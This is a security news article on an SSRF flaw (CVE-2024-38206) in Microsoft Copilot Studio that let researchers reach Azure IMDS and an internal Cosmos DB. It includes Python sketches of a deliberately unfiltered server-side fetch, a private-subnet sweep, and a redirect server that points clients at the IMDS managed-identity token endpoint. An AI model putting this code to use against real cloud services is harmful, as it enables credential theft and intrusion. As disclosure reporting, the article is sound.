Microsoft’s Copilot Studio Exposes Cloud Data Due to SSRF Bug
August 21, 2024
A serious vulnerability was recently discovered in Microsoft's Copilot Studio tool, which is primarily used for creating custom AI chatbots. The flaw, a server-side request forgery (SSRF) bug, allowed researchers to coax the service into making HTTP requests on their behalf, giving them access to sensitive internal services within its cloud environment and potentially affecting multiple tenants.
The SSRF flaw was discovered by researchers at Tenable, who exploited it to reach Microsoft's internal infrastructure, including the Instance Metadata Service (IMDS) and internal Cosmos DB instances, and detailed their findings in a blog post.
The vulnerability, tracked by Microsoft as CVE-2024-38206, allows an authenticated attacker to bypass SSRF protection in Microsoft Copilot Studio and leak sensitive cloud-based information over a network, according to the associated security advisory.
Tenable Security Researcher Evan Grant explained, “An SSRF vulnerability occurs when an attacker is able to influence the application into making server-side HTTP requests to unexpected targets or in an unexpected way.” The researchers tested their exploit by crafting HTTP requests designed to reach cloud data and services belonging to other tenants.
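To make the bug class Grant describes concrete, here is a minimal Python sketch of the vulnerable pattern. The fetch_for_user function and its logic are hypothetical illustrations, not Copilot Studio's actual code; only the IMDS address in the comment is a real, documented Azure endpoint.

```python
import requests

def fetch_for_user(url: str) -> str:
    """Hypothetical server-side fetch performed on behalf of a user.

    Vulnerable: the destination is attacker-influenced and nothing
    restricts it, so the request can target internal-only endpoints
    such as the cloud metadata service or hosts on a private subnet.
    """
    resp = requests.get(url, timeout=5, allow_redirects=True)
    return resp.text

# An attacker who controls "url" turns the service into a proxy into
# the cloud environment, e.g.:
# fetch_for_user("http://169.254.169.254/metadata/instance?api-version=2021-02-01")
```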
While no cross-tenant information was immediately accessible, the researchers found that the infrastructure used for this Copilot Studio service was shared among tenants. This means that any impact on the infrastructure could potentially affect multiple customers. “While we don’t know the extent of the impact that having read/write access to this infrastructure could have, it’s clear that because it’s shared among tenants, the risk is magnified,” said Grant.
The researchers also found that their exploit gave them unrestricted access to other internal hosts on the local subnet to which their instance belonged. Microsoft responded swiftly to Tenable's notification, and the flaw has since been fully mitigated, with no action required on the part of Copilot Studio users.
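Before the fix, that kind of lateral reach could in principle be scripted through the SSRF primitive. The sketch below is a hypothetical illustration, not Tenable's tooling: the ssrf_fetch helper and the 10.0.0.0/24 range are assumptions standing in for the vulnerable HTTP-request feature and the instance's actual subnet.

```python
import requests

def ssrf_fetch(target_url: str) -> int | None:
    """Stand-in for the vulnerable server-side request feature.

    In a real attack the request would be issued by the vulnerable
    service itself; it is made directly here only for illustration.
    """
    try:
        return requests.get(target_url, timeout=2).status_code
    except requests.RequestException:
        return None

# Sweep a private /24 (assumed subnet) for listening HTTP services.
for last_octet in range(1, 255):
    status = ssrf_fetch(f"http://10.0.0.{last_octet}/")
    if status is not None:
        print(f"10.0.0.{last_octet} responded with HTTP {status}")
```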
Copilot Studio was launched by Microsoft last year as a user-friendly tool for creating custom AI assistants or chatbots. These applications let users perform a variety of large language model (LLM) and generative AI tasks using data from the Microsoft 365 environment, or any other data ingested by the Power Platform, on which the tool is built.
The SSRF flaw was discovered by the Tenable researchers when they were investigating SSRF vulnerabilities in the APIs for Microsoft’s Azure AI Studio and Azure ML Studio. These vulnerabilities were flagged and patched by Microsoft before the researchers could report them. The researchers then focused their investigation on Copilot Studio to see if it could be exploited in a similar way.
By combining redirects with SSRF protection bypasses, the researchers managed to retrieve managed identity access tokens from the IMDS, which they then used to reach internal cloud resources such as Azure services and a Cosmos DB instance, ultimately gaining read/write access to the database.
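The general shape of a redirect-based SSRF bypass is well known: the filter validates an attacker-controlled hostname, and the service's HTTP client then follows a 302 redirect to the address the filter would have blocked. The sketch below illustrates that pattern against Azure's documented IMDS token endpoint; the attacker-side server, host, and port are hypothetical, and it assumes the vulnerable client both follows redirects and can be made to send the Metadata: true header that IMDS requires.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer

# Documented Azure IMDS endpoint for requesting a managed identity token.
IMDS_TOKEN_URL = (
    "http://169.254.169.254/metadata/identity/oauth2/token"
    "?api-version=2018-02-01&resource=https://management.azure.com/"
)

class Redirector(BaseHTTPRequestHandler):
    """Attacker-controlled server: the SSRF filter validates this host,
    then the vulnerable client follows the 302 to the IMDS address the
    filter would have rejected if requested directly."""

    def do_GET(self):
        self.send_response(302)
        self.send_header("Location", IMDS_TOKEN_URL)
        self.end_headers()

if __name__ == "__main__":
    # The port is arbitrary; the vulnerable service would be pointed at
    # http://<attacker-host>:8000/ via its HTTP-request feature.
    HTTPServer(("0.0.0.0", 8000), Redirector).serve_forever()
```

A managed identity token obtained this way can be replayed as a Bearer token against Azure APIs, which is broadly how read/write access to backing resources such as a Cosmos DB instance becomes reachable.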
The research did not conclusively determine how much sensitive cloud data the flaw could expose, but it was serious enough to warrant immediate mitigation. Its existence should serve as a warning to Copilot Studio users that attackers can abuse the tool's HTTP-request feature to escalate their access to cloud data and resources.